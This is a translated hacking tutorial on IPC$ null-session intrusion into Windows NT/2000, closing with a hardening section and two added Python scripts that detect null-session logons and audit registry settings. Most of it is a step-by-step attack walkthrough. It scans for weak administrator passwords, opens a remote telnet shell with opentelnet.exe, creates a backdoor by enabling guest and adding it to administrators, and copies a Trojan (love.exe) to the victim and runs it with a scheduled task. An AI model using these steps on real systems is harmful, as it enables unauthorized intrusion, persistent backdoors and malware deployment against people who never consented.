IPC$ null connections
Contents:
Preface
2. What is IPC$?
3. What is a null session?
4. What can a null session do?
5. Ports used by IPC$ connections
6. Significance of IPC$ connections in hacking attacks
7. Common causes of IPC$ connection failure
8. Reasons for file copy failure
9. How to enable IPC$ sharing and other shares on the target
11. Commands that require a shell
Commands that may be used during an intrusion
12. Complete IPC$ intrusion steps
13. How to prevent IPC$ intrusion
14. Selected IPC$ intrusion Q&A
15. Closing words
Preface
There are many articles on the Internet about IPC$ intrusion, and there is no shortage of excellent ones; the attack steps can even be said to have become a classic pattern, so nobody is willing to keep rehashing something that has already become settled theory.
However, I personally think these articles are not detailed enough. For newcomers who have just come into contact with IPC$, a bare list of steps does not resolve their many puzzles (search for IPC$ in any hacking forum to see how many questions there are). So I have written this summary based on some online materials, tutorials and forum posts, hoping to clear up some of the confusing questions and let everyone stop searching here!
Note: unless stated otherwise, everything discussed in this article applies to the Windows NT/2000 environment; Win98 is not covered. Because Windows XP has tightened its security settings, some operations do not apply to it and will be discussed separately.
2. What is IPC$?
IPC$ (Internet Process Connection) is a resource that shares "named pipes": a named pipe opened for inter-process communication. By providing a trusted user name and password, the two parties can establish a secure channel and exchange encrypted data through it to access the remote computer. IPC$ is a new feature of NT/2000; one characteristic is that only one connection can be established between two IP addresses at the same time. When the system is installed, NT/2000 provides IPC$ and enables the default shares, that is, all logical drives (C$, D$, E$, ...) and the system directory winnt or Windows (ADMIN$). Microsoft's original intention for all this was to make administration easier, but intentionally or not, it reduces the security of the system.
We often hear people talk about the "IPC$ vulnerability". In fact, IPC$ is not a vulnerability in the real sense; it is a "back door" left by Microsoft itself: the null session. So what is a null session?
3. What is a null session?
Before introducing null sessions, we need to understand how a secure session is established.
In Windows NT 4.0, a challenge/response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which the two parties can exchange information. The general sequence of the process is as follows:
1) The session requester (client) sends a packet to the session receiver (server), requesting that a secure tunnel be created;
2) The server generates a 64-bit random number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number generated by the server, encrypts it with the password of the account that is trying to establish the session, and returns the result to the server (the response);
4) The server receives the response and passes it to the Local Security Authority (LSA). LSA verifies the response using the user's correct password to confirm the identity of the requester. If the requester's account is a local account of the server, the verification happens locally; if it is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.
That is the general process of establishing a secure session. What about null sessions?
A null session is a session established with the server without trust, that is, without providing a user name or password. According to the Win2000 access control model, establishing a null session still requires a token, but because a null session is not authenticated with user information when it is created, that token contains no user information and the session cannot carry encrypted information between the systems. That does not mean the null session's token contains no security identifiers (SIDs, which identify users and groups). For a null session, the SID that LSA puts in the token is S-1-5-7, the SID of the null session; the user name is ANONYMOUS LOGON (this user name can be seen in user lists, but it is not in the SAM database and belongs to the system's built-in accounts). The access token contains the following pseudo-groups:
Everyone
Network
Under the constraints of the security policy, this null session is authorized to access whatever those two groups are authorized to access. So what can a null session do?
4. What can a null session do?
On NT, with the default security settings, a null connection can be used to list the users and shares on the target host, to access shares that grant Everyone permission, and to read a small part of the registry, none of which is of great value. On 2000 it is even less useful, because in Windows 2000 and later only Administrators and Backup Operators have the right to access the registry over the network by default, and doing so is not convenient: tools are needed. From this we can see that an untrusted session is not very useful, but from the point of view of a complete IPC$ intrusion a null session is an indispensable stepping stone, because it gives us a list of users, which is enough for an experienced hacker. The following are specific commands that can be used in a null session:
1. First, create a null session (the target must have IPC$ open)
Command: net use \\IP\IPC$ "" /user:""
Note: the command above contains four spaces: one between net and use, one after use, and one on each side of the empty password.
2. View the shared resources of the remote host
Command: net view \\IP
Explanation: once the null connection is established, this command lists the shared resources of the remote host. If sharing is enabled, you get output similar to the following:

Shared resources at \\*.*

Share name   Type   Used as   Comment
-----------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.
3. View the current time of the remote host
Command: net time \\IP
Explanation: this command returns the current time of the remote host.
4. Obtain the NetBIOS name list of the remote host (your own NBT must be enabled)
Command: nbtstat -A IP
Explanation: this command returns the NetBIOS name table of the remote host (your own NetBIOS support must be enabled). The output looks like the following:
Node IpAddress: [*.*] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER         <00>  UNIQUE      Registered
    OYAMANISHI-H   <00>  GROUP       Registered
    OYAMANISHI-H   <1C>  GROUP       Registered
    SERVER         <20>  UNIQUE      Registered
    OYAMANISHI-H   <1B>  UNIQUE      Registered
    OYAMANISHI-H   <1E>  GROUP       Registered
    SERVER         <03>  UNIQUE      Registered
    OYAMANISHI-H   <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~SERVER......<00>  UNIQUE      Registered

    MAC Address = 00-50-8B-9A-2D-37
The above is what null sessions are commonly used for. It seems we can get quite a lot from them, but note that establishing an IPC$ connection leaves a record in the event log, whether or not the logon succeeds. Now let's look at the ports IPC$ uses.
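Because every IPC$ session, null or not, is logged, the defender's side of sections 3 and 4 is to look for the null-session identity (ANONYMOUS LOGON, SID S-1-5-7) among network logons. The following added example, not from the original article, scans constructed security-log records in a plain "key: value" layout and counts null-session logons per source address; the hosts, addresses and times are made up.

```python
"""Flag null-session (anonymous) network logons in Windows security-log records.

Added example, not from the original article. The records below are constructed:
the field names follow the 'key: value' layout of security events 540 (NT/2000)
and 4624 (later versions), but hosts, addresses and times are made up, and not
every Windows version records every field, so missing fields are tolerated.
"""
from collections import Counter

NULL_SESSION_SID = "S-1-5-7"        # SID that LSA places in a null-session token
NULL_SESSION_USER = "ANONYMOUS LOGON"
NETWORK_LOGON_TYPE = "3"            # IPC$ / SMB logons are type 3 (network)

SAMPLE_LOG = """\
EventID: 540
Time: 2003-05-12 22:14:03
User Name: ANONYMOUS LOGON
Domain: NT AUTHORITY
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: SCANNER-PC
Source Network Address: 192.0.2.77

EventID: 540
Time: 2003-05-12 22:14:05
User Name: administrator
Domain: OYAMANISHI-H
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: FILESRV
Source Network Address: 192.0.2.10

EventID: 4624
Time: 2003-05-12 22:14:09
Security ID: S-1-5-7
Account Name: ANONYMOUS LOGON
Account Domain: NT AUTHORITY
Logon Type: 3
Source Network Address: 192.0.2.77
"""


def parse_events(text):
    """Split a 'key: value' dump into one dict per event (events are blank-line separated)."""
    events, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                events.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")   # split on the first colon only
        current[key.strip()] = value.strip()
    if current:
        events.append(current)
    return events


def is_null_session_logon(event):
    """True for a network logon whose identity is the null session, by name or by SID."""
    if event.get("Logon Type") != NETWORK_LOGON_TYPE:
        return False
    user = event.get("User Name") or event.get("Account Name", "")
    sid = event.get("Security ID", "")
    return user.upper() == NULL_SESSION_USER or sid == NULL_SESSION_SID


def find_null_sessions(text):
    """Return the flagged events and a per-source count (a sweep shows as a high count)."""
    flagged = [e for e in parse_events(text) if is_null_session_logon(e)]
    per_source = Counter(e.get("Source Network Address", "unknown") for e in flagged)
    return flagged, per_source


if __name__ == "__main__":
    hits, sources = find_null_sessions(SAMPLE_LOG)
    for e in hits:
        print(f"{e['Time']}  event {e['EventID']}  null session from "
              f"{e.get('Source Network Address', 'unknown')}")
    print("null-session logons per source:", dict(sources))
```

A real deployment would feed this the exported Security log instead of SAMPLE_LOG; the per-source count is what separates one stray anonymous logon from a scanner working through the network.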
5. Ports used by IPC$
First, some basic knowledge:
1. SMB (Server Message Block): the Windows protocol family used for file and printer sharing services;
2. NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS networking on top of TCP/IP;
3. In Windows NT, SMB runs on top of NBT; in Windows 2000, SMB runs both on top of NBT and directly on port 445.
With this background, we can discuss how the port is chosen when accessing network shares:
For a Win2000 client:
1. If NBT is allowed when connecting to the server, the client tries ports 139 and 445 at the same time. If port 445 responds, the client sends an RST packet to port 139 to close that connection and uses port 445 for the session; port 139 is used only when port 445 does not respond. If neither port responds, the session fails;
2. If NBT is disabled when connecting to the server, the client only tries port 445. If port 445 does not respond, the session fails. From this it can be seen that a Win 2000 client with NBT disabled will fail to access shares on Win NT.
For a Win2000 server:
1. If NBT is allowed, UDP ports 137 and 138 and TCP ports 139 and 445 are open;
2. If NBT is disabled, only port 445 is open.
Our IPC$ session follows the same port selection rules. Obviously, if the remote server is not listening on port 139 or port 445, the IPC$ session cannot be established.
6. Significance of IPC$ connections in hacking attacks
As mentioned above, even a null connection yields a lot of information (which is usually needed for an intrusion); if you can log on as a user with certain permissions, you get the corresponding permissions. Obviously, if you log on as an administrator, hey, you can do whatever you want. But don't celebrate too early, because the administrator's password is not that easy to get. Although some careless administrators do use weak passwords, they are a minority after all, and today is not like the past: as security awareness grows, administrators are more and more careful, and obtaining the administrator password will become increasingly difficult. So in the future you may often only be able to connect with minimal permissions or none at all, or the host may not even have IPC$ sharing enabled. You will gradually discover that the IPC$ connection is not omnipotent, so expecting every connection to succeed is unrealistic.
Somewhat discouraged? There is no need to be. The key is to set our mindset right: do not treat IPC$ intrusion as a magic weapon or think it is invincible. It is just one of many intrusion methods, and you may use it and come away with nothing. That is normal. In the hacker world not every road leads to Rome, but there is always a road to Rome. Be patient!
7. Common causes of IPC$ connection failure
The following are some common causes of IPC$ connection failure:
1. IPC connections are a special feature of Windows NT and above. Because they rely on many DLL functions in Windows NT, they cannot run on Windows 9x/Me; that is, only NT/2000/XP can establish IPC$ connections with each other, while 98/Me cannot;
2. To successfully establish an IPC$ connection, the other party must have IPC$ sharing enabled, even for a null connection. If the other party has disabled IPC$ sharing, the connection will fail;
3. You have not started the LanmanWorkstation service. It provides network connections and communication; without it you cannot initiate a connection request (display name: Workstation);
4. The peer has not started the LanmanServer service. It provides RPC support, file and printer sharing, and named-pipe sharing; IPC$ depends on it, and a remote host without it cannot respond to your connection request (display name: Server);
5. The peer has not started NetLogon, which supports pass-through account logon authentication over the network;
6. The other party has disabled NBT (that is, port 139 is not open);
7. The peer firewall blocks ports 139 and 445;
8. Your user name or password is wrong (a null session obviously rules this error out);
9. Command entry error: too many or too few spaces. When the user name and password contain no spaces, the double quotes around them can be omitted; if the password is empty, just enter two quotes;
10. If the other party reboots after the connection is established, the IPC$ connection is dropped automatically and must be re-established.
In addition, you can work out the cause from the error number returned:
Error 5, access denied: the account you are using probably does not have administrator privileges; escalate first;
Error 51, Windows cannot find the network path: there is a network problem;
Error 53, network path not found: wrong IP address; target not powered on; target LanmanServer service not started; target firewall (port filtering);
Error 67, network name not found: your LanmanWorkstation service is not started, or the target has deleted IPC$;
Error 1219, the credentials supplied conflict with an existing set of credentials: you already have an IPC$ connection with the other party; delete it and reconnect;
Error 1326, unknown user name or bad password: the cause is obvious;
Error 1792, an attempt was made to log on, but the network logon service was not started: the target's NetLogon service is not started;
Error 2242, the password of this user has expired: the target has an account policy requiring periodic password changes.
8. Reasons for file copy failure
Some friends have successfully established an IPC$ connection but then run into trouble when copying files and cannot copy successfully. What are the common causes of copy failure?
1. Blind copying
This is the most common error, accounting for more than 50%. Many friends do not even know whether the other party has any shared folders and just copy blindly; the copy fails and they are very frustrated. So we recommend using net view \\IP to check the other party's shares before copying. Do not assume that shared folders are always available just because the IPC$ connection succeeded.
2. Default share errors
This kind of error is also common and involves two aspects:
1) Assuming that a host which accepts an IPC$ connection must have the default shares enabled, and copying to ADMIN$ straight after connecting, which fails. A successful IPC$ connection only shows that the peer has IPC$ sharing enabled. IPC$ sharing is not the same as default sharing: IPC$ is a named pipe, not an actual folder, and enabling the default shares is not a prerequisite for IPC$ sharing;
2) Because net view \\IP cannot display the default shares (share names ending in $ are hidden), we cannot use this command to tell whether the other party has the default shares enabled; if they are not enabled, every operation on them will fail. (Most scanning software, however, scans for the default share directories while scanning for weak passwords, which avoids this kind of error.)
3. Insufficient user permissions, including:
1) Copying to any share (default or ordinary) over a null connection: in most cases the permissions are insufficient;
2) Copying to a default share requires administrator permissions;
3) Copying to an ordinary share requires the corresponding permissions (that is, the access permissions the other party set in advance);
4) The other party may forbid external access to its shares through firewall or security software settings;
Note that the Administrator name cannot be changed.
4. Killed by a firewall, or the target is on a LAN
Your copy may have succeeded, but when you run the program remotely it is killed by a firewall, so the file cannot be found; or you may have copied the Trojan to a host inside a LAN, so the connection fails. So be careful when copying; otherwise all your effort is wasted.
As you can see, IPC$ connections can run into all kinds of odd problems in practice. What I have summarized above are some common errors; the ones I have not mentioned you will have to work out for yourself.
9. How to enable IPC$ sharing and other shares on the target
The target's IPC$ cannot be opened easily, otherwise the world would be in chaos. You need a shell with administrator permissions, such as telnet or a Trojan, and then run net share ipc$ in that shell to open the target's IPC$; net share ipc$ /del disables the share again. If you want to open a shared folder, net share baby=c:\ shares its drive C under the share name baby.
11. Commands that require a shell
I have seen many tutorials that are inaccurate on this point: some commands that require a shell are simply executed over the IPC$ connection, which is misleading. Below I summarize the commands that must be completed in a shell:
1. Creating a user on the remote host, activating a user, changing a user's password and adding a user to the administrators group must all be done in a shell;
2. Enabling IPC$ sharing, default sharing or ordinary sharing on the remote host must be done in a shell;
3. Starting or stopping services on the remote host must be done in a shell;
4. Starting or killing processes on the remote host must also be done in a shell.
Commands that may be used during an intrusion
Note whether each command applies to the local host or to the remote host. A command that applies to the local host can only be run against the remote host once you have obtained a shell on it.
1. Create a null connection:
net use \\IP\IPC$ "" /user:""
2. Create a non-null connection:
net use \\IP\IPC$ "psw" /user:"account"
3. View the shared resources of the remote host (the default shares are not shown)
net view \\IP
4. View the shared resources of the local host (the local default shares are shown)
net share
5. Obtain the NetBIOS name list of the remote host
nbtstat -A IP
6. Obtain the user list of the local host
net user
7. View the current time of the remote host
net time \\IP
8. Display the services currently running on the local host
net start
9. Start/stop a local service
net start servicename /y
net stop servicename /y
10. Map a remote share:
net use z: \\IP\baby
This command maps the share named baby to drive Z.
11. Delete a share mapping
net use c: /del   (deletes the mapped drive C; the same for other drives)
net use * /del /y   (deletes all mappings)
12. Copy files to the remote host
copy \path\srv.exe \\IP\sharename, for example:
copy ccbirds.exe \\*.*\c$   copies the file from the current directory to the other party's drive C.
13. Add a scheduled task remotely
at \\IP time program, for example:
at \\127.0.0.0 :00 love.exe
Note: the time is in 24-hour format. No path is needed for programs in the system's default search path (such as system32\); otherwise give the full path.
14. Enable telnet on the remote host
This needs a small program, opentelnet.exe, available from all the major download sites. Four conditions must be met:
1) The target has IPC$ sharing enabled;
2) You have an administrator account and its password;
3) The target has the RemoteRegistry service enabled and uses NTLM authentication;
4) It works on Win2k/XP; NT has not been tested.
Command format: opentelnet.exe \\server account psw NTLMauth port
Example: C:\> opentelnet.exe \\*.* administrator "" 1 90
15. Activate a user / add a user to the Administrators group
1. net user account /active:yes
2. net localgroup administrators account /add
16. Disable telnet on the remote host
This also needs a small program: resumetelnet.exe
Command format: resumetelnet.exe \\server account psw
Example: C:\> resumetelnet.exe \\*.* administrator ""
17. Delete an established IPC$ connection
net use \\IP\IPC$ /del
(This tutorial is updated from time to time; for the latest version, visit the original at the caicainiao community: http://ccbirds.yeah.net)
12. Complete IPC$ intrusion steps
In practice the intrusion steps vary with personal taste. Let's go through the common ones!
1. Use scanning software such as streamer, SSS or X-Scan to search for hosts with weak passwords, and pick a target as you see fit. If you have scanned out the administrator password, you can proceed with the following steps. Assume the administrator password is blank.
2. Two routes are available for the target: telnet (command line) or a Trojan (graphical interface). Let's take the telnet route first.
3. Remember the opentelnet program from the command list above? Use it:
C:\> opentelnet.exe \\192.168.21.* administrator "" 1 90
If the following is returned:
*******************************************************
Remote telnet configure, by refdom
Email: [email protected]
Opentelnet.exe
Usage: opentelnet.exe \\server username password ntlmauthor telnetport
*******************************************************
Connecting \\192.168.21.*... successfully!
Notice!!!!!!
The Telnet service default setting: ntlmauthor=2 telnetport=23
Starting Telnet service...
Telnet service is started successfully! Telnet service is running!
Bingle!!! Yeah!!
Telnet port is 90. You can try: "telnet IP 90", to connect the server!
Disconnecting server... successfully!
* This shows that telnet has been enabled on port 90.
4. Now telnet in
telnet 192.168.21.* 90
If it succeeds you get a shell on the remote host, and you can control this bot just like your own machine. What to do? Activate guest and add it to the administrators group, so that we have a backdoor.
5. C:\> net user guest /active:yes
* This activates the guest user; some targets may already have guest enabled. You can run net user guest to check whether the account is active (yes or no).
6. C:\> net user guest 1234
* This changes guest's password to 1234, or to any password you prefer.
7. C:\> net localgroup administrators guest /add
* This makes guest an administrator, so that even if the administrator changes his password later we can still log on as guest. A reminder, though: security policy settings can forbid remote access by accounts such as guest, and if that is the case our backdoor is wasted. May God bless guest.
8. Now let's take the other route and upload a Trojan for fun.
9. First establish the IPC$ connection:
C:\> net use \\192.168.21.*\IPC$ "" /user:administrator
10. To upload anything, you must first know what shares it has:
C:\> net view \\192.168.21.*

Shared resources at \\192.168.21.*

Share name   Type   Used as   Comment
-----------------------------------------------------------
C            Disk
D            Disk
The command completed successfully.
* We can see that the other party shares its C and D drives, so we can copy files to either. Once again, because the default shares do not appear in net view, the output above cannot tell us whether the default shares are enabled.
11. C:\> copy love.exe \\192.168.21.*\c
        1 file(s) copied.
* This uploads the Trojan client love.exe to the other party's drive C. Ideally, copy it into a system folder, where it is less likely to be noticed.
12. Before running the Trojan, check the target's current time:
net time \\192.168.21.*
Current time at \\192.168.21.* is
The command completed successfully.
13. Now run it with at. The other party must have the Task Scheduler service running (which allows programs to run at a specified time); otherwise it will not work.
C:\> at \\192.168.21.* 11:02 c:\love.exe
Added a new job with job ID = 1
14. The rest is waiting. When the time comes, connect with the control end; if it connects, you can control the remote host through the graphical interface. If it fails, the target may be inside a LAN, the program may have been killed by a firewall, or the target may be offline (not that clever); in any case you have to give up.
Well, those are the two basic routes. If you are familiar with the operations above, you can also use more efficient routines, such as using CA to clone guest, using psexec to run the Trojan, or running psexec \\targetip -u user -p passwd cmd.exe to obtain a shell directly, and so on. You can also use Alibaba's elsave.exe.
Having talked about IPC$ intrusion, we cannot skip how to prevent it. What should we do? See below:
13. How to prevent IPC$ intrusion
1. Prevent null connections from enumerating (this does not stop null connections from being established)
Method 1:
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] and set the DWORD value RestrictAnonymous to 1.
With the value 1, an anonymous user can still connect to the IPC$ share but cannot list SAM accounts and share information through that connection. The value 2, added in Windows 2000, restricts all anonymous access unless explicitly authorized, but setting it to 2 may cause other problems, so we recommend 1. If the value does not exist, create it and set it.
Method 2:
Local Security Settings > Local Policies > Security Options > "Additional restrictions for anonymous connections".
2. Disable the default shares
1) View local shares
Run > cmd > net share
2) Delete a share (the default shares come back after a reboot)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete   (continue with e$, f$, ... if present)
3) Stop the Server service
net stop server /y   (the Server service starts again after a reboot)
4) Stop the default shares from being recreated automatically (this does not disable the IPC$ share)
Run > regedit
Server: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareServer to 00000000.
Pro: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the DWORD value AutoShareWks to 00000000.
If the value does not exist, create it (right-click > New > DWORD value) and set it.
By default these two values do not exist on the host and must be added manually.
3. Disable the service that IPC$ and the default shares depend on: the Server service.
Control Panel > Administrative Tools > Services > find the Server service > right-click > Properties > General > Startup type > Disabled
A message may appear saying that service xxx will also stop and asking whether to continue, because some secondary services depend on LanmanServer; don't worry about it.
4. Block ports 139 and 445
Without these two ports, IPC$ cannot be established, so blocking ports 139 and 445 also prevents IPC$ intrusion.
1) Port 139 can be blocked by disabling NBT
Local Area Connection > TCP/IP properties > Advanced > WINS > select "Disable NetBIOS over TCP/IP"
2) Port 445 can be blocked by modifying the registry
Add the following value:
Hive: HKEY_LOCAL_MACHINE
Key: System\ControlSet\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
Reboot after the change.
Note: with these two ports blocked, you cannot use IPC$ to intrude into others either.
3) Install a firewall to filter the ports
5. Set a complex password to prevent password enumeration over IPC$.
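The registry settings above (RestrictAnonymous, AutoShareServer/AutoShareWks, SMBDeviceEnabled, and the Server service's startup type) are easy to verify from a regedit export of the machine. The following added example, not from the original article, audits such an export against them; the sample export is constructed, all key paths use CurrentControlSet (the live control set, as the other keys in this section do), and the Server service's Start value of 4 is the registry form of the "Disabled" startup type.

```python
"""Audit an exported .reg file for the IPC$ hardening settings described above.

Added example, not from the original article. It reads a regedit export (the
constructed sample below) instead of the live registry, so it runs anywhere.
Key paths use CurrentControlSet (the live control set); the Server service's
'Start' value is the registry form of the startup type (4 = Disabled).
"""
import re

LSA = r"hkey_local_machine\system\currentcontrolset\control\lsa"
LANMAN = r"hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters"
NETBT = r"hkey_local_machine\system\currentcontrolset\services\netbt\parameters"
SERVER_SVC = r"hkey_local_machine\system\currentcontrolset\services\lanmanserver"

# (label, key, value name, pass condition, what a failure means); None = value absent
CHECKS = [
    ("RestrictAnonymous", LSA, "restrictanonymous", lambda v: v is not None and v >= 1,
     "null sessions can enumerate users and shares"),
    ("AutoShareServer", LANMAN, "autoshareserver", lambda v: v == 0,
     "C$/D$/ADMIN$ are recreated at every boot (server)"),
    ("AutoShareWks", LANMAN, "autosharewks", lambda v: v == 0,
     "C$/D$/ADMIN$ are recreated at every boot (workstation)"),
    ("SMBDeviceEnabled", NETBT, "smbdeviceenabled", lambda v: v == 0,
     "port 445 stays open"),
    ("Server service Start", SERVER_SVC, "start", lambda v: v == 4,
     "the service behind IPC$ and the default shares still starts"),
]

# Constructed export: RestrictAnonymous, AutoShareServer and SMBDeviceEnabled set as
# recommended above, AutoShareWks never created, Server service still Automatic (2).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"AutoShareServer"=dword:00000000
"NullSessionPipes"=hex(7):00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"SMBDeviceEnabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver]
"Start"=dword:00000002
"""

VALUE_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')


def parse_reg_export(text):
    """Parse a .reg export into {key path (lower-case): {value name (lower-case): value}}.
    Only dword and string values are decoded; hex(...) data is skipped."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            tree.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                name, dword, string = m.groups()
                tree[current][name.lower()] = int(dword, 16) if dword is not None else string
    return tree


def audit(reg_text):
    """Return {label: (passed, observed value or None, consequence of failing)}."""
    tree = parse_reg_export(reg_text)
    results = {}
    for label, key, name, passes, consequence in CHECKS:
        value = tree.get(key, {}).get(name)       # None: value absent, default applies
        results[label] = (passes(value), value, consequence)
    return results


def failing_checks(reg_text):
    """Labels of the checks that did not pass, in audit order."""
    return [label for label, (ok, _, _) in audit(reg_text).items() if not ok]


if __name__ == "__main__":
    for label, (ok, value, consequence) in audit(SAMPLE_REG).items():
        shown = "absent" if value is None else value
        print(f"[{'ok  ' if ok else 'FAIL'}] {label:<21} = {shown!s:<7} {'' if ok else consequence}")
```

An absent value is reported as failing on purpose: as the text notes, AutoShareServer and AutoShareWks do not exist by default, and their absence means the default shares come back at every boot.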
IPC$ null connections (reprinted)